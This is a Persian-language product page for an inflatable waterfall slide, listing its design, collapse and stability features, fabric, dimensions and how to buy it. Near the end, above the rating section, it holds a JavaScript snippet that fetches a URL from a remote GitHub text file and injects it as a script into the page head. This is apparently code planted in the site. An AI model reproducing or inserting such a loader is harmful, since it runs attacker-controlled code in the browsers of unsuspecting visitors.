سرسره آبشاری

 • سرسره آبشار یکی از محصولات جدید از بادی سازان مجد است و طراحی جدید و منحصر به فرد می باشد.

  طراحی این قصر بادی آبشاری

  این قصر بادی آبشاری از یک طراحی ویژه و منحصر به فرد برخوردار است. این سرسره دارای قابلیت سیستم پایداری در هنگاه تخلیه هوا برخوردار می باشد. پایداری چیست؟ همان طور که در تصویر مشاهده می کنید این دستگاه ترکیبی بدنه این دستگاه مانند بدنه سرسره ارتقاع یافته KM-167 و سر و ایستگاه آن مانند s177 است. مشاهد محصولات دیگر

  این سرسره 2 تیکه که بدنه دستگاه رو بع شکمه آن متصل کنید

  سرسره آبشار

  در سیستم پایداری هر کدوم از هوای این دو تیکه دستگاه را تخلیه کنید سرسره به مدت 5 دقیقه چپ نمی کند. سیستم جمع شو این سرسره اگه هوای قصر بادی رو تخلیه کنید دو ترف دستگاه به سمت وسط خم می آید و سرسره درهم جمع می شود.

  جنس پارچه قصر بادی آبشار

  جنس پارچه قصر بادی آبشاری از با کیفیت ترین پارچه کره ای است که به صورت یک لایه ضخیم ساخته شده تا در برابر فشار بالای هوا مقاوم باشد. همچنین کیفیت این پارچه به دور از پوسدگی زود رس است. برای اطلاعات بیشتر به سایت ما مراجعه کنید.

  مشخصات سرسره آبشاری

  ابعاد و اندازه طول این قصر بادی آبشار 5.8 متر و عرض آن 7.5 متر و ارتفاع این سرسره بادی به 11 متر می رسد که در فضاهایی باز استفاده می شود و وزن کلی این سرسره 500 کیلوگرم می باشد. سرسره مشابه

  نحوه خرید قصر بادی آبشاری

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره آبشاری می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید